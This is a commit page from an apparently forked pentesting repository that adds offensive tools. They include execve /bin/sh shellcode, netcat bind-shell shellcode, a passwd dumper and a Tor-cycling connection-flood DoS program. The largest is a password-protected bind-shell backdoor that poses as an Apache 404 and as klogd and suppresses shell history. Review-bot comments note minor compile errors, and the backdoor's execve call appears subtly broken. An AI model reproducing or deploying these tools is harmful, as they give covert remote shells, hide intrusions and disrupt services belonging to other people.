forked from mariusv/Gray-Hacker-and-PenTesting
Mari Wahl
committed
Feb 12, 2015
1 parent
589dec4
commit 7f078b1
Showing
19 changed files
with
2,613 additions
and
0 deletions.
@@ -0,0 +1,10 @@ | ||
#!/bin/bash | ||
if [ $# -ne 1 ] | ||
then | ||
printf "\n\tUsage: $0 filename\n\n" | ||
exit | ||
fi | ||
filename=`echo $1 | sed s/"\$"//` | ||
nasm -f elf $filename.asm && ld $filename.o -o $filename | ||
|
||
echo "Successfully compiled." |
@@ -0,0 +1,19 @@ | ||
;Universal Shellcode for Unix/Linux | ||
section .text ; Text section | ||
global _start ; Define _start function | ||
|
||
_start: ; _start function | ||
xor eax, eax ; Zero out eax REGister | ||
xor ebx, ebx ; Zero out ebx REGister | ||
xor ecx, ecx ; Zero out ecx REGister | ||
cdq ; Zero out edx using the sign bit from eax | ||
push ecx ; Insert 4 byte null in stack | ||
push 0x68732f6e ; Insert /bin in the stack | ||
push 0x69622f2f ; Insert //sh in the stack | ||
mov ebx, esp ; Put /bin//sh in stack | ||
push ecx ; Put 4 Byte in stack | ||
push ebx ; Put ebx in stack | ||
mov ecx, esp ; Insert ebx address in ecx | ||
xor eax, eax ; Zero out eax register | ||
mov al, 11 ; Insert __NR_execve 11 syscall | ||
int 0x80 ; Syscall execute |
@@ -0,0 +1,29 @@ | ||
;netcat backdoor to inject as a shellcode | ||
jmp short todo | ||
shellcode: | ||
xor eax, eax ; Zero out eax | ||
xor ebx, ebx ; Zero out ebx | ||
xor ecx, ecx ; Zero out ecx | ||
xor edx, edx ; Zero out edx using the sign bit from eax | ||
mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4) | ||
int 0x80 ; syscall execute | ||
pop esi ; esi contain the string in db | ||
xor eax, eax ; Zero out eax | ||
mov[esi + 7], al ; null terminate /bin/nc | ||
mov[esi + 16], al ; null terminate -lvp90 | ||
mov[esi + 26], al ; null terminate -e/bin/sh | ||
mov[esi + 27], esi ; store address of /bin/nc in AAAA | ||
lea ebx, [esi + 8] ; load address of -lvp90 into ebx | ||
mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx | ||
lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx | ||
mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx | ||
mov[esi + 39], eax ; Zero out DDDD | ||
mov al, 11 ; 11 is execve syscakk number | ||
mov ebx, esi ; store address of /bin/nc | ||
lea ecx, [esi + 27] ; load address of ptr to argv[] array | ||
lea edx, [esi + 39] ; envp[] NULL | ||
int 0x80 ; syscall execute | ||
todo: | ||
call shellcode | ||
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD' | ||
; 0123456789012345678901234567890123456789012 |
@@ -0,0 +1,10 @@ | ||
#include <pwd.h> | ||
int main() | ||
{ | ||
struct passwd *p; | ||
while( | ||
p=getpwent()) | ||
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,p->pw_passwd, | ||
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); | ||
} | ||
|
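Review bot: `printf` is called without `#include <stdio.h>`, so it is implicitly declared; implicit declarations were removed in C99 and current compilers warn or reject this — add `#include <stdio.h>` next to `<pwd.h>`. The two `%d` conversions are paired with `p->pw_uid` and `p->pw_gid`, which are `uid_t`/`gid_t` rather than `int`, so the specifier does not match the argument type; the portable form casts explicitly, e.g. `(unsigned long)p->pw_uid` with `%lu`. The loop also never calls `endpwent()` after `getpwent()` returns NULL, leaving the underlying database stream open until process exit. The condition `p=getpwent()` is split across two lines, which reads like a typo; `while ((p = getpwent()) != NULL)` makes the assignment-in-condition intent explicit.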
@@ -0,0 +1,107 @@ | ||
|
||
#include <stdio.h> | ||
#include <stdlib.h> | ||
#include <string.h> | ||
#include <stdint.h> | ||
#include <unistd.h> | ||
#include <netdb.h> | ||
#include <signal.h> | ||
#include <sys/socket.h> | ||
#include <sys/types.h> | ||
#include <netinet/in.h> | ||
#include <arpa/inet.h> | ||
|
||
|
||
int make_socket(char *host, char *port) { | ||
struct addrinfo hints, *servinfo, *p; | ||
int sock, r; | ||
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port); | ||
memset(&hints, 0, sizeof(hints)); | ||
hints.ai_family = AF_UNSPEC; | ||
hints.ai_socktype = SOCK_STREAM; | ||
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { | ||
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); | ||
exit(0); | ||
} | ||
for(p = servinfo; p != NULL; p = p->ai_next) { | ||
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { | ||
continue; | ||
} | ||
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { | ||
close(sock); | ||
continue; | ||
} | ||
break; | ||
} | ||
if(p == NULL) { | ||
if(servinfo) | ||
freeaddrinfo(servinfo); | ||
fprintf(stderr, "No connection could be made\n"); | ||
exit(0); | ||
} | ||
if(servinfo) | ||
freeaddrinfo(servinfo); | ||
fprintf(stderr, "[Connected -> %s:%s]\n", host, port); | ||
return sock; | ||
} | ||
|
||
|
||
void broke(int s) { | ||
// do nothing | ||
} | ||
|
||
|
||
#define CONNECTIONS 8 | ||
#define THREADS 48 | ||
|
||
|
||
void attack(char *host, char *port, int id) { | ||
int sockets[CONNECTIONS]; | ||
int x, g=1, r; | ||
for(x=0; x!= CONNECTIONS; x++) | ||
sockets[x]=0; | ||
signal(SIGPIPE, &broke); | ||
while(1) { | ||
for(x=0; x != CONNECTIONS; x++) { | ||
if(sockets[x] == 0) | ||
sockets[x] = make_socket(host, port); | ||
r=write(sockets[x], "\0", 1); | ||
if(r == -1) { | ||
close(sockets[x]); | ||
sockets[x] = make_socket(host, port); | ||
} else | ||
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); | ||
fprintf(stderr, "[%i: Voly Sent]\n", id); | ||
} | ||
fprintf(stderr, "[%i: Voly Sent]\n", id); | ||
usleep(300000); | ||
} | ||
} | ||
|
||
|
||
void cycle_identity() { | ||
int r; | ||
int socket = make_socket("localhost", "9050"); | ||
write(socket, "AUTHENTICATE \"\"\n", 16); | ||
while(1) { | ||
r=write(socket, "signal NEWNYM\n\x00", 16); | ||
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); | ||
usleep(300000); | ||
} | ||
} | ||
|
||
|
||
int main(int argc, char **argv) { | ||
int x; | ||
if(argc !=3) | ||
cycle_identity(); | ||
for(x=0; x != THREADS; x++) { | ||
if(fork()) | ||
attack(argv[1], argv[2], x); | ||
usleep(200000); | ||
} | ||
getc(stdin); | ||
return 0; | ||
} | ||
|
||
|
@@ -0,0 +1,8 @@ | ||
/* Get stack pointer of the system(Unix/Linux) */ | ||
#iclude <stdio.h> | ||
unsigned long get_sp(void) { | ||
__asm__("movl %esp,%eax"); | ||
} | ||
void main() { | ||
printf("0x%x\n", get_sp()); | ||
} |
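Review bot: `#iclude <stdio.h>` is a misspelled preprocessor directive, so the file does not compile as committed and `printf` would be undeclared in any case; it should read `#include <stdio.h>`. `get_sp` is declared to return `unsigned long` but has no `return` statement, so reaching its closing brace and then using the value in the caller is undefined behaviour in standard C; the code presumably relies on the inline `movl %esp,%eax` leaving the result in the return register, which also ties it to 32-bit x86 and to the compiler not reordering around the asm. `printf("0x%x\n", get_sp())` pairs `%x` with an `unsigned long` argument; the matching specifier is `%lx`. `void main()` is not a standard signature for a hosted program; `int main(void)` with `return 0;` is.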
@@ -0,0 +1,129 @@ | ||
#define _XOPEN_SOURCE | ||
#include <stdio.h> | ||
#include <unistd.h> | ||
#include <stdlib.h> | ||
#include <sys/types.h> | ||
#include <sys/socket.h> | ||
#include <sys/wait.h> | ||
#include <netinet/in.h> | ||
#include <signal.h> | ||
#include <string.h> | ||
|
||
#define DEFAULT_PORT 8080 | ||
/* des crypted password */ | ||
#define PWD "QXtGlGiFUEeKY" | ||
|
||
void sig_hand(int sig) { | ||
int status; | ||
/* rip off children */ | ||
while(waitpid(-1,&status,WNOHANG)>0); | ||
|
||
} | ||
|
||
/* we hide ourselves as httpd daemon */ | ||
char *erro= | ||
"HTTP/1.1 404 Not Found\n" | ||
"Date: Mon, 08 Dec 1998 23:17:15 GMT\n" | ||
"Server: Apache/1.3.X (Unix)\n" | ||
"Connection: close\n" | ||
"Content-Type: text/html\n\n" | ||
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n" | ||
"<HTML><HEAD>\n" | ||
"<TITLE>404 Not Found</TITLE>\n" | ||
"</HEAD><BODY>\n" | ||
"<H1>Not Found</H1>\n" | ||
"The requested URL /loha was not found on this server.<P>\n" | ||
"<HR>\n" | ||
"<ADDRESS>Apache/1.3.X Server at yourserver Port 80</ADDRESS>\n" | ||
"</BODY></HTML>\n"; | ||
|
||
void my_error(int fd) { | ||
write(fd,erro,strlen(erro)); | ||
} | ||
|
||
int main(int argc,char **argv) | ||
{ | ||
char *name[3]; | ||
char *env[2]; | ||
char *execname; | ||
int fd,fd2,fromlen; | ||
int port; | ||
struct sockaddr_in serv; | ||
char *crypted=PWD; | ||
unsigned char *ptr; | ||
char pass[9]; | ||
|
||
port=DEFAULT_PORT; | ||
if (argc>1 && atoi(argv[1])) port=atoi(argv[1]); | ||
#ifndef DEBUG | ||
if (fork()) exit(1); | ||
close(0); | ||
close(1); | ||
close(2); | ||
chdir("/"); | ||
setsid(); | ||
#endif | ||
signal(SIGCHLD,sig_hand); | ||
|
||
if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { | ||
#ifdef DEBUG | ||
perror("socket"); | ||
#endif | ||
exit(1); | ||
} | ||
serv.sin_addr.s_addr=0; | ||
serv.sin_port=htons(port); | ||
serv.sin_family=AF_INET; | ||
|
||
if(bind(fd,(struct sockaddr *)&serv,16)) { | ||
#ifdef DEBUG | ||
perror("bind"); | ||
#endif | ||
exit(1); | ||
} | ||
|
||
if(listen(fd,5)) { | ||
#ifdef DEBUG | ||
perror("listen"); | ||
exit(1); | ||
#endif | ||
} | ||
|
||
for(;;) { | ||
fromlen=16; /*(sizeof(struct sockaddr)*/ | ||
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); | ||
if (fd2<0) continue; | ||
|
||
if (fork()) { /* parent */ | ||
close(fd2); | ||
} else { | ||
close(fd); | ||
bzero(pass,9); | ||
read(fd2,pass,8); | ||
for(ptr=pass;*ptr!=0;ptr++) | ||
if(*ptr<32) *ptr=0; | ||
if (strcmp(crypt(pass,crypted),crypted)) { | ||
my_error(fd2); | ||
exit(1); | ||
} | ||
dup2(fd2,0); | ||
dup2(fd2,1); | ||
dup2(fd2,2); | ||
execname="/bin/sh"; | ||
name[0]="/sbin/klogd"; | ||
/* gives somewhat nicer appearence */ | ||
name[1]="-i"; | ||
name[2]=NULL; | ||
/* if the actual /bin/sh is bash | ||
* we need this to get rid saving stuff into | ||
* .bash_history file | ||
*/ | ||
env[0]="HISTFILE=/dev/null"; | ||
env[1]=NULL; | ||
execve(name[0],name,env); | ||
exit(1); | ||
} | ||
} | ||
} | ||
|
||
|